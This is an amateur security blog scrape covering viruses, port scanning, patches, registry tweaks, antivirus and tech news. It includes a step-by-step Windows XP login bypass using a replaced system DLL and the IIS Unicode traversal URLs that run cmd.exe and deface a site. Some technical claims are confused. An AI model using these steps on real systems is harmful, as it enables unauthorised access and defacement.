Spiga

What Is VIRUS?


In Computers world,a virus is defined as a program or programming code that replicates by being copied or initiating its copying to another program, computer boot sector or document and infect the computer without permission or knowledge of the user.


Transmission of Virus

Viruses can be transmitted as attachments to an e-mail note or in a downloaded file, or be present on a diskette or CD. The immediate source of the e-mail note, downloaded file, or diskette you've received is usually unaware that it contains a virus. Some viruses wreak their effect as soon as their code is executed; other viruses lie dormant until circumstances cause their code to be executed by the computer. Some viruses are benign or playful in intent and effect ("Happy Birthday, Ludwig!") and some can be quite harmful, erasing data or causing your hard disk to require reformatting. A virus that replicates itself by resending itself as an e-mail attachment or as part of a network message is known as a worm.


Classes Of Viruses:


1)File infectors:-Some file infector viruses attach themselves to program files, usually selected '.COM' or '.EXE' files. Some can infect any program for which execution is requested, including .SYS, .OVL, .PRG, and .MNU files. When the program is loaded, the virus is loaded as well. Other file infector viruses arrive as wholly-contained programs or scripts sent as an attachment to an e-mail note.

2)System or boot-record infectors:-- These viruses infect executable code found in certain system areas on a disk. They attach to the DOS boot sector on diskettes or the Master Boot Record on hard disks. A typical scenario (familiar to the author) is to receive a diskette from an innocent source that contains a boot disk virus. When your operating system is running, files on the diskette can be read without triggering the boot disk virus. However, if you leave the diskette in the drive, and then turn the computer off or reload the operating system, the computer will look first in your A drive, find the diskette with its boot disk virus, load it, and make it temporarily impossible to use your hard disk.

3)Macro viruses:-- These are among the most common viruses, and they tend to do the least damage. Macro viruses infect your Microsoft Word application and typically insert unwanted words or phrases.


First Ever Virus:

The program code called "Elk Cloner",created in "in the wild", that is, outside the single computer or lab,is credited with being the first computer virus to appear. Written by Richard Skrenta, in 1982,it attached itself to the Apple DOS 3.3 operating system and spread by floppy disk. This virus was originally a joke, created by the high school student and put onto a game. The game was set to play, but release the virus on the 50th time of starting the game. Only this time, instead of playing the game, it would change to a blank screen that read a poem about the virus named Elk Cloner. The computer would then be infected.
The first PC virus was a boot sector virus called (c)Brain, created in 1986 by two brothers, Basit and Amjad Farooq Alvi, operating out of Lahore, Pakistan. The brothers reportedly created the virus to deter pirated copies of software they had written. However, analysts have claimed that the Ashar virus, a variant of Brain, possibly predated it based on code within the virus.The newest species of the virus family is the cross-site scripting virus. The virus emerged from research and was academically demonstrated in 2005[citation needed]. This virus utilises cross-site scripting vulnerabilities to propagate. Since 2005 there have been multiple instances of the cross-site scripting viruses in the wild, most notable sites affected have been MySpace and Yahoo.


digg story


read more

Machine Level Program On Windows


Learn How To Do Simple Machine Level Program On Computer

Machine Level Program are those program,which are directly understandable by the Machine.The Machine read those program and directly acts according to that.For Example,if we have to switch off a machine when its temprature is more then 100 degree celsius and keep the Machine working if temprature is below 100 degree celsius,for this we need the Machine Level programming.So,Machine Level programming is as important as other languages programms are like java programming,c++,c,perl,asp & jsp and all other.

In Machine Level programming,all the data are stored in register memory.Accumulator and Base register are most frequently used in this operations.here,they are represented by AX,and Bx.

How to move a data in register:

mov AX,0032

This,above syntax will move the Hexadecimal number 0032 in accumulator AX.

sub AX,0032

This,above syntax will subtract the Hexadecimal number 0032 from accumulator AX.

Program for converting the Farenheit temp into celsius:
formula for conversion:
c=[(c-32)*5]/9

/* open run and type cmd in it.
command prompt will open.
type "debug"
type "a" /this will take us in assembler mode/
*/

Program code:

mov AX,0098
sub AX,0032
mov BX,05
mul BX /multiply content of BX with AX/
mov BX,0009
div BX /divide content of AX by BX/
p /compile the program/
t /show the result in AX/




*NOTE:All the value will be in Hexadecimal.

How Port Scanner Work


Port Scanning Basic Techniques
The simplest port scan tries (i.e., sends a carefully constructed packet with a chosen destination port number) each of the ports from 0 to 65535 on the victim to see which ones are open.
TCP connect():- The connect() system call provided by an OS is used to open a connection to every interesting port on the machine. If the port is listening, connect() will succeed, otherwise the port isn't reachable.
Strobe -A strobe does a narrower scan, only looking for those services the attacker knows how to exploit. The name comes from one of the original TCP scanning programs, though now virtually all scanning tools include this feature.
The ident protocol allows for the disclosure of the username of the owner of any process connected via TCP, even if that process didn't initiate the connection. So, e.g., one can connect to port 80 and then use identd to find out whether the HTTP server is running as root.
Port Scanning Advanced Techniques
One problem, from the perspective of the attacker attempting to scan a port, is that services listening on these ports log scans. They see an incoming connection, but no data, so an error is logged. There exist a number of stealth scan techniques to avoid this. A stealth scan is a kind of scan that is designed to go undetected by auditing tools. Obviously, this is a race between the hacker and firewall vendors - what are considered stealth scans now may not be so in a few months once the firewall vendor becomes aware of such techniques.
Port scanners scan a host rapidly by firing off packets at different ports. So, scanning very slowly (taking a day or more) becomes a stealth technique. Another stealth scanning technique is "inverse mapping", where you try to find out all hosts on a network by generating "host unreachable" ICMP-messages for those IPs that do not exist. Since these messages may be generated by any TCP/IP packet one may send meaningless packets (e.g. RST packets sent without any previous packet).
Fragmented packet Port Scan
The scanner splits the TCP header into several IP fragments. This bypasses some packet filter firewalls because they cannot see a complete TCP header that can match their filter rules. Some packet filters and firewalls do queue all IP fragments, but many networks cannot afford the performance loss caused by the queuing.
SYN scan
This technique is also called half-open scanning, because a TCP connection is not completed. A SYN packet is sent (as if we are going to open a connection), and the target host responds with a SYN+ACK, this indicates the port is listening, and an RST indicates a non- listener. The server process is never informed by the TCP layer because the connection did not complete.
FIN scan
The typical TCP scan attempts to open connections (at least part way). Another technique sends erroneous packets at a port, expecting that open listening ports will send back different error messages than closed ports. The scanner sends a FIN packet, which should close a connection that is open. Closed ports reply to a FIN packet with a RST. Open ports, on the other hand, ignore the packet in question. This is required TCP behavior.
If no service is listening at the target port, the operating system will generate an error message. If a service is listening, the operating system will silently drop the incoming packet. Therefore, silence indicates the presence of a service at the port. However, since packets can be dropped accidentally on the wire or blocked by firewalls, this isn't a very effective scan.
Other techniques that have been used consist of XMAS scans where all flags in the TCP packet are set, or NULL scans where none of the bits are set. However, different operating systems respond differently to these scans, and it becomes important to identify the OS and even its version and patch level.
Bounce Scan
The ability to hide their tracks is important to attackers. Therefore, attackers scour the Internet looking for systems they can bounce their attacks through.
FTP bounce scanning takes advantage of a vulnerability of the FTP protocol itself. It requires support for proxy ftp connections. This bouncing through an FTP server hides where the attacker comes from. This technique is similar to IP spoofing in that it hides where the attacker comes from. For example, badwebsitexyz.com establishes a control connection to the FTP server-PI (protocol interpreter) of say, badspiderbites.com, then requests that the server-PI initiate an active server-DTP (data transfer process) to send a file anywhere on the Internet.
A port scanner can exploit this to scan TCP ports from a proxy ftp server. Thus you could connect to an FTP server behind a firewall, and then scan ports that are more likely to be blocked (e.g., port 139). If the ftp server allows reading from and writing to a directory (such as /incoming), you can send arbitrary data to ports that you do find open.
The advantages to this approach are obvious (harder to trace, potential to bypass firewalls). The main disadvantages are that it is slow, and that many FTP server implementations have finally disabled the proxy "feature".
Finger
Most finger servers allow commands to be forwarded through them. Finger supports recursive queries. A query such as "rob@foo@bar" will ask "bar" to resolve "rob@foo", causing "bar" to query "foo". This technique can be used to hide the original source of the request.
E-mail: Spammers try to relay their spam through SMTP servers. As a result, probes for SMTP are commonly seen by machines on the Internet.
SOCKS Allows almost any protocol to be tunneled through the intermediate machine. As a result, attackers probing for SOCKS is common scan seen on the Internet.
HTTP proxy: Most web servers support proxying so that all web traffic can be directed to a single server for filtering as well as caching to improve performance. A lot of these servers are misconfigured to allow proxying of any request from the Internet, allowing attackers to relay attacks against web sites through a third party. Probes for HTTP proxies are one of the more common scans seen today.
IRC BNC: Attackers love to hide their IRC identities by bouncing their connections through other machines. A particular program called "BNC" is used for this purpose on compromised machines.
UDP Scanning
Port scanning usually means scanning for TCP ports, which are connection-oriented and therefore give good feedback to the attacker. UDP responds in a different manner. In order to find UDP ports, the attacker generally sends empty UDP datagrams. If the port is listening, the service should send back an error message or ignore the incoming datagram. If the port is closed, then most operating systems send back an "ICMP Port Unreachable" message. Thus, you can find out if a port is NOT open, and by exclusion determine which ports are open. Neither UDP packets, nor the ICMP errors are guaranteed to arrive, so UDP scanners of this sort must also implement retransmission of packets that appear to be lost (or you will get a bunch of false positives).
Also, this scanning technique is slow because of compensation for machines that implement the suggestions of RFC 1812 and limit ICMP error message rate. For example, a kernal may limit destination unreachable message generation to 80 per 4 seconds, with a 1/4 second penalty if that is exceeded.
Some people think UDP scanning is pointless - not so. Sometimes for example, Rpcbind can be found hiding on an undocumented UDP port somewhere above 32770. So it doesn't matter that port 111 is blocked by the firewall. But can you find which of the more than 30,000 high ports it is listening on? With a UDP scanner you can.
ICMP Scan
This isn't really port scanning, since ICMP does not have a port abstraction. But it is sometimes useful to determine what hosts in a network are up by pinging them all. ICMP scanning can be done in parallel, so it can be quite fast.
Fingerprinting an OS:
The last scanning method is called Fingerprinting. Fingerprinting is the technique of interpreting the responses of a system in order to figure out what it is. Unusual combinations of data are sent to the system in order to trigger these responses. Systems respond the same with correct data, but they rarely respond the same way for wrong data.

AVG Internet Security Wins


AVG:Winner Of Two 2007 Global Excellence Awards


Users Worldwide Voted AVG Internet Security the Most Trusted Integrated Security Software and Antivirus Software and it Wins Two 2007 Global Excellence Awards From Info Security Products Guide.

MILLBURN, N.J.--GRISOFT, the developer of AVG Internet security software, announced today that Info Security Products Guide, a Silicon Valley Communications publication and the world’s leading publication on security-related products and technologies, has named AVG Internet Security a winner of the 2007 Global Excellence in both Integrated Security Software and AntiVirus Customer Trust Awards. Over 18,000 global users and prospective customers were invited to vote for the products that they trust the most when it comes to protecting their digital resources.

Larry Bridwell, GRISOFT’s VP of Global Security Strategies,said,“We are honored to have AVG Internet Security receive double recognition as the most trusted Integrated Security Software and Antivirus software. This is a testament to our commitment to continually meet the security needs of users,”.He also says “Our goal has always been to provide global users with industry leading software security solutions and gain their trust in our products. Thus, employing some of the world’s leading experts in antivirus software, as well as working with other industry experts, a majority of our work and efforts are in research and development in order to provide the best in security protection against information threats.”

Critical Attack Slams Microsoft IE 6 and 7


Attack Throgh IE 6 and 7

Attackers could hijack your PC if you simply viewed a Web site or read an HTML e-mail laced with a poisoned animated-cursor file (.ani).So,be alert while opening Webpages and reading HTML pages.The flaw can be targeted through browsers, including Internet Explorer (6 and 7) and Firefox, as well as via Outlook versions 2002 SP3 and later, on Windows XP SP2 and Vista systems. Microsoft says that the risk with IE 7 under Vista is mitigated because of IE’s protected mode, and that Outlook 2007 is safe because it uses Word to display HTML e-mail.

What is surprising is that the Microsoft knew about the hole three months before the attacks began. You can get the patch over Microsoft Automatic Updates or at Microsoft’s website.

IE 7’s troubles continue with a proof-of-concept phishing exploit published by security researcher Aviv Raff. Using it, an attacker could fool you and IE with an e-mail or Web link to a doctored error page that, when refreshed as directed, would send you to a phishing site disguised as a legitimate destination. The impostor site would show the real site’s URL in the address bar, potentially tricking even careful surfers.
At press time Microsoft had not yet issued a fix; as always your best bet is never to click an e-mail link to access your bank or other financial account, even if you’re sure that the e-mail is legit. Instead, type in the address yourself or use a bookmark. For more, including a vulnerability test, see the Secunia website.

Microsoft is shipping another patch batch that improves Vista compatibility for a range of programs, including Trend Micro Internet Security 2007 and Microsoft Money 2006. For the patch and a list of affected apps, see Microsoft’s March 2007 Windows Vista Application Compatibility Update. Expect such fixes to be a regular thing.


Update for Apple Quick Time Media Player.


Apple has released yet another update to fix multiple dangerous holes in its QuickTime media player software for both Mac and Windows.The patch closes eight critical vulnerabilities in how the player handles a variety of media files--and annoyingly it will put QuickTime on your desktop and in your system tray whether you want it there or not. An attacker exploiting any of the flaws could hit you with a drive-by download if you visit a rigged site or click on an e-mail link to a poisoned movie, so make sure that you have version 7.1.5 or later. Learn more from Apple’s page on the security content of QuickTime 7.1.5.


More battery woes


Lenovo is recalling and replacing 205,000 (100,000 in the United States) lithium ion laptop batteries for ThinkPads sold between November 2003 and February 2005, due to an overheating problem that can occur if the battery is dropped or hit. To find out if your battery is affected, see Lenovo’s battery recall support page.

PORT SCANNER:HACKERS TOOL


"HACK TO LEARN,NOT LEARN TO HACK"

What Is Port Scanner?

A port scanner is a piece of software designed to search a network host for open ports. This is often used by administrators to check the security of their networks and by hackers to compromise it. To port scan a host is to scan for multiple listening ports on a single target host. To port sweep is to scan multiple hosts for a specific listening port. The latter is typically used in searching for a specific service.

How A Scanner Works ?
Each time you send or receive data through the Internet, your mail (or web, chat, or whatever) program must connect to a remote port of a remote host. Some of the services are ftp21-file transfer protocol,telnet23_Telnet,smtp25-simple mail transfer etc.

In fact, the list of services/ports is greater than the above and includes three different ports ranges:
port range utilization
0 - 1023 well known ports, which includes the most common services, like smtp, pop3, ftp, etc. 1024 - 49151 registered ports, which are assigned by the IANA organization
49152 - 65535 dynamic and/or private ports, which can be freely used

The TCP/IP protocol is based on the OSI (Open Systems Interconnection) model, developed between 1977 and 1984. That model uses a proposal of the ISO (International Organization for Standardization), so it is well known as the ISO/OSI model also. The ISO/OSI architecture divides the network into various layers (application, presentation, session, transport, network, data-link and phisical).

The IP and TCP protocols are the ground of data transfer. The IP protocol, which works at network layer, handles the transfer of raw data between computers. At this level, each packet contains the data which must be transferred and the ip address of the sender and the receiver. The TCP protocol works at the transport layer, but the principle is the same. TCP replaces the ip address concept with the port concept. Each transferred packet contains the data and the port number, where the port number is associated with a service instead of a computer.
In other words, the IP protocol moves the raw data from one computer to other, using the ip address to identify each computer of the network. Well, but when the data arrives to the destination computer, where must be leaved ? Are you browsing the WEB ? If so, the TCP protocol redirects the incoming data through the port used by the HTTP service (80). Are you using an FTP client ? The TCP protocol redirects the incoming data through the port used by the service (21), and so on.
As you can see, the port and service concepts are the basic principles used during data transfer through the Internet. Now you can understand which is the main purpose of a TCP/IP scanner. If you want to know what are the services currently running on a remote host, you must scan its ports.

HACK WINDOWS WITHOUT CHANGING PASSWORD


Hack into the computer running Windows XP without changing its password and find out all passwords on the machine (including admin accounts). You do not need access to any accounts to do this,of course, but please not do this on anyone elses computer without there proper authorisation.


Steps to Hack into a Windows XP Computer without changing password:

1. Get physical access to the machine. It must have a CD or DVD drive.


3. Unzip the downloaded dreampackpl_iso.zip and you'll get dreampackpl.ISO.

4. Use any burning program that can burn ISO images.

5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.

6.Press "R" to install DreamPackPL and "C" to install DreamPackPL by using the recovery console.

7. Select the Windows installation that is currently on the computer (Normally is "1" if you only have one Windows installed)

8. Backup your original sfcfiles.dll by typing:"ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld" (without quotes)

9. Copy the hacked file from CD to system32 folder. Type:"copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without quotes and assuming your CD drive is D:)

10. Type "exit", take out disk and reboot.

11. In the password field, type "dreamon" (without quotes) and DreamPack menu will appear.

12. Click the top graphic on the DreamPack menu and you will get a menu popup.

13. Go to commands and enable the options and enable the god command.

14. Type "god" in the password field to get in Windows.
You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to login with ANY password.

ETHICAL HACKING



What is ethical hacking?

In an ethical hacking, a computer and network professional attacks a security system on behalf of its owners seeking vulnerabilities that a malicious hacker can exploit. Ethical hacking is also known as “penetration testing”, “intrusion testing” and “red teaming”. A person who is associated with ethical hacking is sometimes called a white hat. Ethical hackers apply the same methodologies as their less ethical counterparts, but report the network weaknesses to the network owners, rather than take advantage of such weaknesses.

An ethical hacker is a person who can be trusted and generally employed with an organization to carry out an effort to create hole or penetrate in networks and/or computer systems using the same methods as the regular hacker used. The distinguishing characteristic of an ethical hacker is that he or she is expressly authorized to investigate the target. A certified ethical hacker is a capable professional who identifies and knows how to look for the weaknesses and vulnerabilities in target systems and he makes use of knowledge and tools similar to that of a malicious hacker.



The Goals Of The Ethical Hacker?

The ethical hacker is there to assist the organization in taking preventive measures against malicious attacks, by attacking the system, but remaining within legal limits. The extensive growth of the Internet has given rise to e-commerce, easy access to vast stores, electronic mail, new opportunities for advertising and information distribution, etc, but these technological improvements have encouraged criminal hackers. Governments, major companies and citizens all over the world are concerned that any hacker can break into their web server and reinstate their insignia with pornography, or have access to their e-mails, steal their credit card number from an on-line shopping site or place software which will secretly transmit their secrets to the Internet. An ethical hacker can help to overcome these problems.


The Ethical Hacker Should Be Trusted?

When, the ethical hackers identify a weakness in the client’s security, the criminal hacker will be more likely to utilize that vulnerability. This is particularly disturbing as the activities of the ethical hackers may hide criminal hacking. It is always advisable to maintain numerous addresses around the Internet from which the ethical hacker’s transmissions will originate and to control origin addresses regularly. Also, the total logs of the tests performed by the ethical hackers are constantly preserved for the final report. Furthermore, in serious cases, additional intrusion monitoring software can be installed at the target to make sure that all the tests are coming from the ethical hacker's machines.
The Ethical Hacker frequently holds the “keys to the company,” and hence must be trusted to exercise rigid control upon any information about a target that could be misunderstood. To understand the information collected at the time of an evaluation requires tough security measures to be taken such as limited-access labs with physical security protection and full ceiling-to-floor walls, multiple secure Internet connections, a safe to hold paper documentation from clients, strong cryptography to protect electronic results, and isolated networks for testing to ensure the security of the systems being employed by the ethical hackers themselves. Usually, ethical hackers have strong programming and computer networking skills and have been in the computer and networking business for some years and are skilled at installing and maintaining systems that use the recent accepted operating systems used on target systems.

LEARN HACKING-|


"Hey!!!You can be the hacker also after reading this article.So go on... "
REGISTRY HACKING


With the help of registry hacking you can change the look and so many features of your computer.Registry ie .reg file is the structure of the computer,it controls everything of your computer,like,desktop menu look,color,drives,other security features.

Get ready to learn Registry Hacking.Its very easy and too much interesting,after this you'll be able to say "What!I have done this.Its so easy!!!"

To do Registry Hacking open "regedit.exe" from command prompt.

Disabling Right click on the Desktop
In the regedit file open:"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
Make a Dword Key:"NoViewContextMenu"="0"
save the setting.

Disabling the Start Button and the Windows Menu Bar
Search for the following Registry key:
HKEY_CLASSES_ROOT\CLSID\{5b4dae26-b807-11d0-9815-00c04fd91972}
Rename the above key as:
HKEY_CLASSES_ROOT\CLSID\{*5b4dae26-b807-11d0-9815-00c04fd91972}

Preventing users from Logging off
open the following key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
create a new Dword value:
"StartMenuLogoff"
and set its value to 0 to enable the logoff option,and to 1 to disable it.

Customizing Folder Icons
Create a text file with following contents and save it as "desktop.ini"
CONTENTS:
[.ShellClassInfo]
ICONFILE=C:\...(path of ur icon)

Blocking Acess To Specific Drives
search this key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Create a new Dword value:
"NoViewOnDrive"
Set its value as you want to hide as per the list below:
A: 1,B: 2,C: 4,D: 8,E: 16,F: 32,G: 64,H: 128
and so on as in the series.

Putting Restriction on Everything In Windows

open:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Make the following key:

"NoDeletePrinter"

"NoAddPrinter"

"NoRun"

"NoFind"

"NoDrives"

There are so many other keys also,but I dont have much time,as I have to prepare for my College test.


We can also use "Explorer.exe" to edit windows,but that require a little bit of knowledge,because even a small change in it can harm the OS and even it can't work.

HACKERS SECRET


How Do Hackers Break Into Computers?

"You have to be a Hacker or think like a Hacker,for making a well designed security system."

for breaking into a computer hackers discovered(find) vulnerabilities and then create an exploit (a program or set of instructions to be followed by hand) that takes advantage of the vulnerabilities. These vulnerabilities and their related exploit programs, if made public, are then used by many others, good and bad. For example, some users are system administrators using them to test their systems. Others are computer hackers just wanting to have fun. Then there are the crackers who scan systems to determine which computers have vulnerabilities and then carry out an attack.

How to Discover New Vulnerabilities
Many of the most skilled individuals involved in discovering new ways to break into computers work in corporate, governmental, or academic laboratories. They not only use considerable brainpower and creativity in their jobs but also typically create and use sophisticated software tools to assist them in their research duties. (The National Security Agency, or NSA, was one of the earliest government agencies to create such a research group). Even in these research environments, the people who find ways to break into computers typically describe themselves as "hackers." The analyst access to the source code (that is, commands the programmers write). This process is called "white-box" analysis. Depending on the software language they are examining for vulnerabilities, usually there are programs that will scan for commands or syntax known to cause problems. Some programming languages, most famously Java, are inherently designed to resist security flaws.

Disassemblers and Decompilers
A disassembler converts a program back into the original programming language. This is a difficult task, and it is likely to work only with a small program, typically one written in Java. A decompiler converts software into assembly language. Assembly language is a low-level language far more difficult to understand than the high-level languages in which most computer programs are written. Nevertheless, a sufficiently talented programmer can analyze assembly language. Although decompilers are typically able to handle larger programs than are disassemblers, they can process only comparatively small programs. Today, decompilers are the tools of choice to analyze worms, viruses, and other small instances of malware (that is, malicious programs).

WINDOWS XP
In Windows XP, some 40 million lines of source code confront the analyst team or crackers. It is difficult for decompiler to extract code from such a big program. Even a debugger would make little headway. So, other alternatives are choosen, the most prevalent of which is the "black box" analysis. In this process, the professional analyst team or crackers try to find all the possible ways to give inputs. They then try the inputs to determine whether they have the potential to "crash" a system or evade security. Because of the difficulty of this process, the team or the individual uses a "fault injection" tool to speed this technique. Examples of fault injection include a database query crafted to command a database server to erase everything, or a Web browser URL infecting a Web server with a worm. The process of trying all those different inputs looking for some fault is also known as fuzzing.
Buffer Overflows
Buffer and heap overflows are special cases of fault injection. Testing for these conditions has discovered the majority of computer security flaws known today. Basically, a "buffer overflow" is a condition whereby too much data is placed in too little allocated space in a computer's memory. The extra data, if properly crafted, and if inserted into a program with the right kind of access to memory, can end up in a region of memory enabling a break-in.
Crackers have discovered buffer overflows by simply trying super-long data inputs, such as typing a long URL into a browser location window. A super-long URL is an example of an "injection vector." When the attacker sees some sort of error condition resulting from this injection, this is a sign that a buffer overflow has occurred. An example of an error condition is to get the error message on a UNIX-type of system known as "segmentation fault." The trick is to see whether one may use the overflow condition to break into a computer. The attacker next inserts "shellcode" into this long string of data. Shellcode is a compiled program actually performing the break-in. Shellcode is the "payload" of the exploit.

FINAL ATTACK

After the cracker has detected vulnerabilities in the system he or she has decided to attack, the next step is to carry out the attack. In some cases, the exploit itself is easy. What follows is an example of an exploit to break into a Windows 2000 Web server and deface its Website. This exploit will work on Windows 2000 Server or Windows Professional, but only if it has not been patched beyond Service Pack 2, and only if it is running IIS or a Personal Web Server that is not patched.

1)The attack program is simply a Web browser, and the attacker just has to insert a series of URLs in the location window. The first URL identifies whether the server is likely to be vulnerable:
http://victim.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"dir%20c:\"
In the preceding URL, %20 means "space." The "+" also means "space." The %255c is Unicode encoded. After it goes through the Unicode translation, the attacker winds up with 5c, which is hex for ‘\'. So from the string ..%255c..%255c, you get ..\..\ for "go up two directories."
If the victim computer is vulnerable, the attacker's browser will show something like the ­following:
Directory of c:\09/21/2001 09:59a ASFRoot
09/22/2001 06:53a Documents and Settings
09/21/2001 05:06p Inetpub
09/29/2001 05:37p Microsoft UAM Volume
09/21/2001 05:09p Program Files
10/01/2001 03:57p WINNT
0 File(s) 0 bytes
6 Dir(s) 8,984,092,672 bytes free
2)The next malicious URL the attacker must insert is as follows:
http://victim.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"copy%20..\..\winnt\system32\cmd.exe%20..\scripts\cmd1.exe"
This copies cmd.exe (running the MS-DOS program in Windows 2000, NT and XP) into the Web server's scripts directory. This directory holds CGI (Common Gateway Interface) programs. (Examples of CGI programs are shopping carts and programs to search the local Website.) If the server is vulnerable, the attacker sees the following in the browser:
CGI Error.
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are
1 file(s) copied.
This error message reveals that the attack copied the cmd.exe program into the scripts ­directory.

3)The final step is to insert this URL:
http://victim.com/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+I%20broke%20in%20xyz!+../wwwroot/iisstart.asp&dir&type+../wwwroot/iisstart.asp
This creates a main page for the Website that says, "I broke in xyz!" Note that this only works if the main page is named iisstart.asp. If it is named something else, such as index.shtml, the attacker must make the substitution for the proper main page name.


In this way hackers Invade your system,so be ready to face the Hackers.

Porn And Gambling On Internet Targeted




China Government Takes Virtual Cops Help To Weed Out Porn And Gambling Over Internet




In China,the Government will soon assign "virtual cops" to monitor and wipe out pornography, gambling and other illicit activities on the Internet, the Ministry of Public Security (MPS) said. The ministry said,by the end of June, the virtual cops will monitor all major portals and online forums across China.
Nine other ministerial level government departments and the MPS will take part in the campaign to root out "harmful material and information" and "illicit activities" from the Internet, starting this month.
"The existence of these problems has affected the healthy development of the Internet, brought harm to the youths' minds, contaminated the social ethos and disrupted the social order," Zhang Xinfeng, vice-minister of the MPS was quoted by the Xinhua News Agency as saying.

How it will work


The police inserted a floating cartoon icon of a policeman on major websites. The sites are linked to the local police stations and have an alarm system. The success of that program prompted the MPS to take it nationwide.The simple appearance of these floating icons will remind people these websites are under surveillance.


In the next six months, the ministries will crack down on illegal online activities such as distributing pornographic materials and organizing cyber strip shows. They intend to purge the Web of sexually explicit images, stories, and audio and video clips.
The campaign will also target illegal online lotteries, contraband trade and fraud, said Zhang.




PUNISHMENT


Chen Hui,the creator of the largest pornographic website in the country was cracked and arrested by the police,last November. He was later sentenced to life imprisonment.The website Chen started contained more than 9 million pornographic images and articles and had more than 600,000 registered users.

Secret Of AntiVirus


How The AntiVirus Works In A Computer


AntiVirus software has a few methods to detect malicious code (virus, Trojan, stealth, ghost). The first thing to understand is most networks use either TCP/IP RFC 793 or IPX. Both are built with layers (OSI Model,internet protocol) to provide communication across cables, airwaves, etc. These layers break down how the communication will take part between computers. Examples are games versus database access.

The Virus signatures are patterns that are matched by the antivirus software within these communication layers. Most viruses do have patterns, but some don't. That is when the intelligent engine in the antivirus software takes over. The OSI model has rules applied through RFC793 (www.rfc.net), and when these rules are broken the antivirus program can sense or detect and report.

Most antivirus software will offer to delete or contain (quarantine) the malicious code. Remember, the antivirus program runs in the random access memory (RAM or memory) of a computer. All communication from that computer through TCP/IP or IPX is programmed to be monitored by the antivirus software, thus when malicious code is detected it is stopped before it can damage the computer.


How antivirus software and System Restore work together

The System Restore in Windows XP, restore your computer to a previous state, and you do not lose personal data files (such as Word documents, graphic files, and e-mail). System Restore actively monitors computer file changes and some program file changes to record or store earlier versions before the changes occurred. You do not have to take computer snapshots because System Restore automatically creates identifiable restore points that you can use to revert to a previous time. Restore points are created when significant computer events occur (such as the installation of a program or a driver) and periodically (each day).

System Restore monitors, records, and in some cases copies these files before they are modified,to help protect critical computer and program files. For example, when a procedure or a program (such as an upgrade, an inadvertent user change, a driver installation, or a virus) modifies a critical computer file or program file, System Restore records and saves a copy of the file before the change occurs. If a problem occurs, a restore operation can replace files with previously saved versions of those files. Antivirus programs use auto-detection or scanning mechanisms to monitor critical and personal files on the computer for signs of infection. The antivirus program then takes action to clean, remove, or quarantine (isolate) files that known viruses have infected. System Restore also tracks an antivirus program when it modifies (cleans), moves, or deletes a monitored, critical, computer or program file.During a restoration, an active antivirus program scans for infected files. If the antivirus program detects any infected files, the antivirus program tries to modify, move, or delete the infected files. If the antivirus program successfully cleans the infected files, System Restore restores the cleaned files. However, if the antivirus software cannot clean a file, the antivirus software deletes or quarantines the file. As a result, the restoration does not work because these actions to the file cause an inconsistent restoration state. As a result, System Restore reverts to the state immediately before the restoration.Signature files for antivirus programs are updated as viruses become known. As a result, a restoration that did not work several days ago might succeed after the antivirus program is updated. However, if you undo and retry a restoration to a point that succeeded before, the restoration may not work if a new signature or definition detects a virus that the antivirus program cannot clean on a backed-up file.

Internet Router In Space



US military have planned to put internet router in space:The satellite is set for launch in the first quarter of 2009




ROUTER
The US military are planning to test an internet router in space, in a project that may benefit civilian broadband satellite communications.


Companies like Cisco Systemsand Intelsat General, a subsidiary of Intelsat, are selected by the US Department of Defence for its Internet Routing In Space (IRIS) project, which aims to deliver military communications through a satellite-based router.


Presently to send a message from one remote terminal to another via satellite we requires the first terminal to send the data to the satellite, from where it is bounced back to an earth station for routing. The earth station re-transmits it to the satellite on a different frequency, selected depending on its destination, and the satellite bounces it back to its destination. With the router in space, the satellite can pick the channel used to send the message to its destination. By eliminating the message's round trip to the earth station, operators can increase satellite capacity and reduce transmission times between remote terminals by using fewer hops and fewer frequencies for each message.For the IRIS program, satellite operator Intelsat will manage the three-year project, while Cisco will provide IP networking software for the on-board router.Internet routing technology being tested in the IRIS project will enable this communication by "decoding what comes up in the C-band or Ku-band and interconnecting the two," says Wood.


The IRIS payload will support network services for voice, video and data. The system is designed to support IP packet Layer 3 routing or multicast distribution, which can be reconfigured on demand.The Defense Information Systems Agency will have overall responsibility for coordinating the use of IRIS technology among government users and leveraging IRIS capability once the satellite is in space.

AVAST VS NORTON


Which One Is Better:AVAST OR NORTON


Dear Readers,this article is totally based on the users of this software,and not a personal opinion.

Some users say,AVAST is Better,some other says no NORTON is best.

Their views are described below:


"Norton sucks the pc,slowdown it too much that if become difficult to continue with it."

"Why is Avast better than Norton? Seems more complicated to run at first"

"Avast is so much better that you can't hardly compare them...I would rather not have any protection on my computer than run some crap like Norton on it"

"One big issue is the amount of resources used by Norton AV05. Removing it & installing a lighter AV program like Avast or AVG acts much like getting a cpu or memory upgrade"

"Avast automatically updates, automatically scans everything and tells you when you get something bad(basically, you never should have to scan your comp for viruses), plus it is free, take up less resources...there is nothing that Norton is better at...well, other than sucking"

"One thing I noticed with Avast is it detects a lot of false positives more than it's found viruses on my system. So far only one trojan and virus it removed that was something I downloaded and scanned with Avast. Generally there are no descriptions and usually just claim files to be a trojan. I had given up trying to submit or write reports that they are false positives. I just installed Avast and Spyware one day when microsoft antispyware missed a trojan that started loading spyware onto my system. It messed up my symantec antivirus corporate edition because there was an update I needed to install.After installing spysweeper, it took out the trojan and the malware/spyware and avast didn't have to do anything as it was clean from there.However Avast found several files that were false positives which I guess makes up for all those viruses that norton misses."

"Nothing is better than anything (cycle)avast is free and does not use a lot of system resource so avast win "

"Lol, Norton sucks! xP.Did I mention that I would much rather run no antivirus than run norton...I wouldn't use norton if they paid me to(well...mabey a few hundred a day and I might...but otherwise no) "

"Norton, AVG and McAfee are all crap.Avast is best for free av and Nod32 or Kaspersky for the best"

